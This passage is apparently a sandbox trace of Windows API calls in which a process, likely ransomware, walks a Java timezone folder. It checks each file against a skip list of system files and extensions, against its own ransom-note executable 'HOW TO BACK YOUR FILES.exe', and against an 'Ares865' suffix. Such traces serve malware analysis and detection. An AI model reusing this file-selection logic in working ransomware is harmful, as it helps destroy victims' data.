lpString2="bootmgr") returned 1 [0056.042] lstrcmpiW (lpString1="Swift_Current", lpString2="temp") returned -1 [0056.042] lstrcmpiW (lpString1="Swift_Current", lpString2="pagefile.sys") returned 1 [0056.042] lstrcmpiW (lpString1="Swift_Current", lpString2="boot") returned 1 [0056.042] lstrcmpiW (lpString1="Swift_Current", lpString2="ids.txt") returned 1 [0056.042] lstrcmpiW (lpString1="Swift_Current", lpString2="ntuser.dat") returned 1 [0056.042] lstrcmpiW (lpString1="Swift_Current", lpString2="perflogs") returned 1 [0056.042] lstrcmpiW (lpString1="Swift_Current", lpString2="MSBuild") returned 1 [0056.042] lstrlenW (lpString="Swift_Current") returned 13 [0056.042] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Vincent") returned 58 [0056.042] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Swift_Current" | out: lpString1="Swift_Current") returned="Swift_Current" [0056.043] lstrlenW (lpString="Swift_Current") returned 13 [0056.043] lstrlenW (lpString="Ares865") returned 7 [0056.043] lstrcmpiW (lpString1="Current", lpString2="Ares865") returned 1 [0056.043] lstrlenW (lpString=".dll") returned 4 [0056.043] lstrcmpiW (lpString1="Swift_Current", lpString2=".dll") returned 1 [0056.043] lstrlenW (lpString=".lnk") returned 4 [0056.043] lstrcmpiW (lpString1="Swift_Current", lpString2=".lnk") returned 1 [0056.043] lstrlenW (lpString=".ini") returned 4 [0056.043] lstrcmpiW (lpString1="Swift_Current", lpString2=".ini") returned 1 [0056.043] lstrlenW (lpString=".sys") returned 4 [0056.043] lstrcmpiW (lpString1="Swift_Current", lpString2=".sys") returned 1 [0056.043] lstrlenW (lpString="Swift_Current") returned 13 [0056.043] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tegucigalpa", cAlternateFileName="TEGUCI~1")) returned 1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2="aoldtz.exe") returned 1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2=".") returned 1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2="..") returned 1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2="windows") returned -1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2="bootmgr") returned 1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2="temp") returned -1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2="pagefile.sys") returned 1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2="boot") returned 1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2="ids.txt") returned 1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2="ntuser.dat") returned 1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2="perflogs") returned 1 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2="MSBuild") returned 1 [0056.043] lstrlenW (lpString="Tegucigalpa") returned 11 [0056.043] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current") returned 61 [0056.043] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Tegucigalpa" | out: lpString1="Tegucigalpa") returned="Tegucigalpa" [0056.043] lstrlenW (lpString="Tegucigalpa") returned 11 [0056.043] lstrlenW (lpString="Ares865") returned 7 [0056.043] lstrcmpiW (lpString1="cigalpa", lpString2="Ares865") returned 1 [0056.043] lstrlenW (lpString=".dll") returned 4 [0056.043] lstrcmpiW (lpString1="Tegucigalpa", lpString2=".dll") returned 1 [0056.044] lstrlenW (lpString=".lnk") returned 4 [0056.044] lstrcmpiW (lpString1="Tegucigalpa", lpString2=".lnk") returned 1 [0056.044] lstrlenW (lpString=".ini") returned 4 [0056.044] lstrcmpiW (lpString1="Tegucigalpa", lpString2=".ini") returned 1 [0056.044] lstrlenW (lpString=".sys") returned 4 [0056.044] lstrcmpiW (lpString1="Tegucigalpa", lpString2=".sys") returned 1 [0056.044] lstrlenW (lpString="Tegucigalpa") returned 11 [0056.044] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x354, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Thule", cAlternateFileName="")) returned 1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2="aoldtz.exe") returned 1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2=".") returned 1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2="..") returned 1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2="windows") returned -1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2="bootmgr") returned 1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2="temp") returned 1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2="pagefile.sys") returned 1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2="boot") returned 1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2="ids.txt") returned 1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2="ntuser.dat") returned 1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2="perflogs") returned 1 [0056.044] lstrcmpiW (lpString1="Thule", lpString2="MSBuild") returned 1 [0056.044] lstrlenW (lpString="Thule") returned 5 [0056.044] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa") returned 59 [0056.044] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Thule" | out: lpString1="Thule") returned="Thule" [0056.044] lstrlenW (lpString="Thule") returned 5 [0056.044] lstrlenW (lpString="Ares865") returned 7 [0056.044] lstrlenW (lpString=".dll") returned 4 [0056.044] lstrcmpiW (lpString1="Thule", lpString2=".dll") returned 1 [0056.044] lstrlenW (lpString=".lnk") returned 4 [0056.044] lstrcmpiW (lpString1="Thule", lpString2=".lnk") returned 1 [0056.044] lstrlenW (lpString=".ini") returned 4 [0056.044] lstrcmpiW (lpString1="Thule", lpString2=".ini") returned 1 [0056.044] lstrlenW (lpString=".sys") returned 4 [0056.044] lstrcmpiW (lpString1="Thule", lpString2=".sys") returned 1 [0056.045] lstrlenW (lpString="Thule") returned 5 [0056.045] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Thunder_Bay", cAlternateFileName="THUNDE~1")) returned 1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2="aoldtz.exe") returned 1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2=".") returned 1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2="..") returned 1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2="windows") returned -1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2="bootmgr") returned 1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2="temp") returned 1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2="pagefile.sys") returned 1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2="boot") returned 1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2="ids.txt") returned 1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2="ntuser.dat") returned 1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2="perflogs") returned 1 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2="MSBuild") returned 1 [0056.045] lstrlenW (lpString="Thunder_Bay") returned 11 [0056.045] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule") returned 53 [0056.045] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Thunder_Bay" | out: lpString1="Thunder_Bay") returned="Thunder_Bay" [0056.045] lstrlenW (lpString="Thunder_Bay") returned 11 [0056.045] lstrlenW (lpString="Ares865") returned 7 [0056.045] lstrcmpiW (lpString1="der_Bay", lpString2="Ares865") returned 1 [0056.045] lstrlenW (lpString=".dll") returned 4 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2=".dll") returned 1 [0056.045] lstrlenW (lpString=".lnk") returned 4 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2=".lnk") returned 1 [0056.045] lstrlenW (lpString=".ini") returned 4 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2=".ini") returned 1 [0056.045] lstrlenW (lpString=".sys") returned 4 [0056.045] lstrcmpiW (lpString1="Thunder_Bay", lpString2=".sys") returned 1 [0056.045] lstrlenW (lpString="Thunder_Bay") returned 11 [0056.046] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tijuana", cAlternateFileName="")) returned 1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2="aoldtz.exe") returned 1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2=".") returned 1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2="..") returned 1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2="windows") returned -1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2="bootmgr") returned 1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2="temp") returned 1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2="pagefile.sys") returned 1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2="boot") returned 1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2="ids.txt") returned 1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2="ntuser.dat") returned 1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2="perflogs") returned 1 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2="MSBuild") returned 1 [0056.046] lstrlenW (lpString="Tijuana") returned 7 [0056.046] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay") returned 59 [0056.046] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Tijuana" | out: lpString1="Tijuana") returned="Tijuana" [0056.046] lstrlenW (lpString="Tijuana") returned 7 [0056.046] lstrlenW (lpString="Ares865") returned 7 [0056.046] lstrlenW (lpString=".dll") returned 4 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2=".dll") returned 1 [0056.046] lstrlenW (lpString=".lnk") returned 4 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2=".lnk") returned 1 [0056.046] lstrlenW (lpString=".ini") returned 4 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2=".ini") returned 1 [0056.046] lstrlenW (lpString=".sys") returned 4 [0056.046] lstrcmpiW (lpString1="Tijuana", lpString2=".sys") returned 1 [0056.046] lstrlenW (lpString="Tijuana") returned 7 [0056.046] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x788, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Toronto", cAlternateFileName="")) returned 1 [0056.046] lstrcmpiW (lpString1="Toronto", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.046] lstrcmpiW (lpString1="Toronto", lpString2="aoldtz.exe") returned 1 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2=".") returned 1 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2="..") returned 1 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2="windows") returned -1 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2="bootmgr") returned 1 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2="temp") returned 1 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2="pagefile.sys") returned 1 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2="boot") returned 1 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2="ids.txt") returned 1 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2="ntuser.dat") returned 1 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2="perflogs") returned 1 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2="MSBuild") returned 1 [0056.047] lstrlenW (lpString="Toronto") returned 7 [0056.047] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana") returned 55 [0056.047] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Toronto" | out: lpString1="Toronto") returned="Toronto" [0056.047] lstrlenW (lpString="Toronto") returned 7 [0056.047] lstrlenW (lpString="Ares865") returned 7 [0056.047] lstrlenW (lpString=".dll") returned 4 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2=".dll") returned 1 [0056.047] lstrlenW (lpString=".lnk") returned 4 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2=".lnk") returned 1 [0056.047] lstrlenW (lpString=".ini") returned 4 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2=".ini") returned 1 [0056.047] lstrlenW (lpString=".sys") returned 4 [0056.047] lstrcmpiW (lpString1="Toronto", lpString2=".sys") returned 1 [0056.047] lstrlenW (lpString="Toronto") returned 7 [0056.047] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tortola", cAlternateFileName="")) returned 1 [0056.047] lstrcmpiW (lpString1="Tortola", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.047] lstrcmpiW (lpString1="Tortola", lpString2="aoldtz.exe") returned 1 [0056.047] lstrcmpiW (lpString1="Tortola", lpString2=".") returned 1 [0056.047] lstrcmpiW (lpString1="Tortola", lpString2="..") returned 1 [0056.047] lstrcmpiW (lpString1="Tortola", lpString2="windows") returned -1 [0056.047] lstrcmpiW (lpString1="Tortola", lpString2="bootmgr") returned 1 [0056.047] lstrcmpiW (lpString1="Tortola", lpString2="temp") returned 1 [0056.048] lstrcmpiW (lpString1="Tortola", lpString2="pagefile.sys") returned 1 [0056.048] lstrcmpiW (lpString1="Tortola", lpString2="boot") returned 1 [0056.048] lstrcmpiW (lpString1="Tortola", lpString2="ids.txt") returned 1 [0056.048] lstrcmpiW (lpString1="Tortola", lpString2="ntuser.dat") returned 1 [0056.048] lstrcmpiW (lpString1="Tortola", lpString2="perflogs") returned 1 [0056.048] lstrcmpiW (lpString1="Tortola", lpString2="MSBuild") returned 1 [0056.048] lstrlenW (lpString="Tortola") returned 7 [0056.048] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto") returned 55 [0056.048] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Tortola" | out: lpString1="Tortola") returned="Tortola" [0056.048] lstrlenW (lpString="Tortola") returned 7 [0056.048] lstrlenW (lpString="Ares865") returned 7 [0056.048] lstrlenW (lpString=".dll") returned 4 [0056.048] lstrcmpiW (lpString1="Tortola", lpString2=".dll") returned 1 [0056.048] lstrlenW (lpString=".lnk") returned 4 [0056.048] lstrcmpiW (lpString1="Tortola", lpString2=".lnk") returned 1 [0056.048] lstrlenW (lpString=".ini") returned 4 [0056.048] lstrcmpiW (lpString1="Tortola", lpString2=".ini") returned 1 [0056.048] lstrlenW (lpString=".sys") returned 4 [0056.048] lstrcmpiW (lpString1="Tortola", lpString2=".sys") returned 1 [0056.048] lstrlenW (lpString="Tortola") returned 7 [0056.048] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x638, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vancouver", cAlternateFileName="VANCOU~1")) returned 1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2="aoldtz.exe") returned 1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2=".") returned 1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2="..") returned 1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2="windows") returned -1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2="bootmgr") returned 1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2="temp") returned 1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2="pagefile.sys") returned 1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2="boot") returned 1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2="ids.txt") returned 1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2="ntuser.dat") returned 1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2="perflogs") returned 1 [0056.048] lstrcmpiW (lpString1="Vancouver", lpString2="MSBuild") returned 1 [0056.048] lstrlenW (lpString="Vancouver") returned 9 [0056.049] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tortola") returned 55 [0056.049] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Vancouver" | out: lpString1="Vancouver") returned="Vancouver" [0056.049] lstrlenW (lpString="Vancouver") returned 9 [0056.049] lstrlenW (lpString="Ares865") returned 7 [0056.049] lstrcmpiW (lpString1="ncouver", lpString2="Ares865") returned 1 [0056.049] lstrlenW (lpString=".dll") returned 4 [0056.049] lstrcmpiW (lpString1="Vancouver", lpString2=".dll") returned 1 [0056.049] lstrlenW (lpString=".lnk") returned 4 [0056.049] lstrcmpiW (lpString1="Vancouver", lpString2=".lnk") returned 1 [0056.049] lstrlenW (lpString=".ini") returned 4 [0056.049] lstrcmpiW (lpString1="Vancouver", lpString2=".ini") returned 1 [0056.049] lstrlenW (lpString=".sys") returned 4 [0056.049] lstrcmpiW (lpString1="Vancouver", lpString2=".sys") returned 1 [0056.049] lstrlenW (lpString="Vancouver") returned 9 [0056.049] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x454, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Whitehorse", cAlternateFileName="WHITEH~1")) returned 1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2="aoldtz.exe") returned 1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2=".") returned 1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2="..") returned 1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2="windows") returned -1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2="bootmgr") returned 1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2="temp") returned 1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2="pagefile.sys") returned 1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2="boot") returned 1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2="ids.txt") returned 1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2="ntuser.dat") returned 1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2="perflogs") returned 1 [0056.049] lstrcmpiW (lpString1="Whitehorse", lpString2="MSBuild") returned 1 [0056.049] lstrlenW (lpString="Whitehorse") returned 10 [0056.049] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver") returned 57 [0056.049] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Whitehorse" | out: lpString1="Whitehorse") returned="Whitehorse" [0056.049] lstrlenW (lpString="Whitehorse") returned 10 [0056.049] lstrlenW (lpString="Ares865") returned 7 [0056.049] lstrcmpiW (lpString1="tehorse", lpString2="Ares865") returned 1 [0056.050] lstrlenW (lpString=".dll") returned 4 [0056.050] lstrcmpiW (lpString1="Whitehorse", lpString2=".dll") returned 1 [0056.050] lstrlenW (lpString=".lnk") returned 4 [0056.050] lstrcmpiW (lpString1="Whitehorse", lpString2=".lnk") returned 1 [0056.050] lstrlenW (lpString=".ini") returned 4 [0056.050] lstrcmpiW (lpString1="Whitehorse", lpString2=".ini") returned 1 [0056.050] lstrlenW (lpString=".sys") returned 4 [0056.050] lstrcmpiW (lpString1="Whitehorse", lpString2=".sys") returned 1 [0056.050] lstrlenW (lpString="Whitehorse") returned 10 [0056.050] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x618, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Winnipeg", cAlternateFileName="")) returned 1 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2="aoldtz.exe") returned 1 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2=".") returned 1 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2="..") returned 1 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2="windows") returned 1 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2="bootmgr") returned 1 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2="temp") returned 1 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2="pagefile.sys") returned 1 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2="boot") returned 1 [0056.050] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Winnipeg" | out: lpString1="Winnipeg") returned="Winnipeg" [0056.050] lstrlenW (lpString="Winnipeg") returned 8 [0056.050] lstrlenW (lpString="Ares865") returned 7 [0056.050] lstrcmpiW (lpString1="innipeg", lpString2="Ares865") returned 1 [0056.050] lstrlenW (lpString=".dll") returned 4 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2=".dll") returned 1 [0056.050] lstrlenW (lpString=".lnk") returned 4 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2=".lnk") returned 1 [0056.050] lstrlenW (lpString=".ini") returned 4 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2=".ini") returned 1 [0056.050] lstrlenW (lpString=".sys") returned 4 [0056.050] lstrcmpiW (lpString1="Winnipeg", lpString2=".sys") returned 1 [0056.050] lstrlenW (lpString="Winnipeg") returned 8 [0056.051] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yakutat", cAlternateFileName="")) returned 1 [0056.051] lstrcmpiW (lpString1="Yakutat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.051] lstrcmpiW (lpString1="Yakutat", lpString2="aoldtz.exe") returned 1 [0056.051] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Yakutat" | out: lpString1="Yakutat") returned="Yakutat" [0056.051] lstrlenW (lpString="Yakutat") returned 7 [0056.051] lstrlenW (lpString="Ares865") returned 7 [0056.051] lstrlenW (lpString=".dll") returned 4 [0056.051] lstrcmpiW (lpString1="Yakutat", lpString2=".dll") returned 1 [0056.051] lstrlenW (lpString=".lnk") returned 4 [0056.051] lstrcmpiW (lpString1="Yakutat", lpString2=".lnk") returned 1 [0056.051] lstrlenW (lpString=".ini") returned 4 [0056.051] lstrcmpiW (lpString1="Yakutat", lpString2=".ini") returned 1 [0056.051] lstrlenW (lpString=".sys") returned 4 [0056.051] lstrcmpiW (lpString1="Yakutat", lpString2=".sys") returned 1 [0056.051] lstrlenW (lpString="Yakutat") returned 7 [0056.051] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yellowknife", cAlternateFileName="YELLOW~1")) returned 1 [0056.051] lstrcmpiW (lpString1="Yellowknife", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.051] lstrcmpiW (lpString1="Yellowknife", lpString2="aoldtz.exe") returned 1 [0056.051] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Yellowknife" | out: lpString1="Yellowknife") returned="Yellowknife" [0056.051] lstrlenW (lpString="Yellowknife") returned 11 [0056.051] lstrlenW (lpString="Ares865") returned 7 [0056.051] lstrcmpiW (lpString1="owknife", lpString2="Ares865") returned 1 [0056.051] lstrlenW (lpString=".dll") returned 4 [0056.051] lstrcmpiW (lpString1="Yellowknife", lpString2=".dll") returned 1 [0056.051] lstrlenW (lpString=".lnk") returned 4 [0056.051] lstrcmpiW (lpString1="Yellowknife", lpString2=".lnk") returned 1 [0056.051] lstrlenW (lpString=".ini") returned 4 [0056.051] lstrcmpiW (lpString1="Yellowknife", lpString2=".ini") returned 1 [0056.051] lstrlenW (lpString=".sys") returned 4 [0056.052] lstrcmpiW (lpString1="Yellowknife", lpString2=".sys") returned 1 [0056.052] lstrlenW (lpString="Yellowknife") returned 11 [0056.052] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: 